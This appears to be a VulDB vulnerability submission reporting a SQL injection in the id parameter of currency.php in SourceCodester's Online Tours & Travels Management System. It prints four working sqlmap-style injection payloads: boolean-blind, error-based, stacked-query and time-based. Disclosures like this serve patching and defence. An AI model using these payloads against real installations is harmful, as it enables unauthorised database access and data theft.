| Título | SourceCodester Online Tours & Travels Management System currency.php sql injection |
|---|
| Descrição | SourceCodester Online Tours & Travels Management System currency.php sql injection
Url: admin/operations/currency.php
Abstract:
Line 44 of currency.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
1. Data enters a program from an untrusted source.
2. The data is used to dynamically construct a SQL query.
In this case, the data is passed to exec() in currency.php on line 44.
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: id=111' AND 9192=(SELECT (CASE WHEN (9192=9192) THEN 9192 ELSE (SELECT 7773 UNION SELECT 6688) END))-- -
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=111' AND GTID_SUBSET(CONCAT(0x7171767671,(SELECT (ELT(7846=7846,1))),0x71767a7671),7846)-- FmDU
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=111';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
Payload: id=111' AND 8032=BENCHMARK(5000000,MD5(0x54465361))-- fyPR
Download Code:
https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html |
|---|
| Fonte | ⚠️ https://blog.csdn.net/weixin_43864034/article/details/129730106 |
|---|
| Utilizador | DONG (UID 43580) |
|---|
| Submissão | 23/03/2023 07h28 (há 3 anos) |
|---|
| Moderação | 23/03/2023 08h31 (1 hour later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 223655 [SourceCodester Online Tours & Travels Management System 1.0 currency.php exec ID Injeção SQL] |
|---|
| Pontos | 20 |
|---|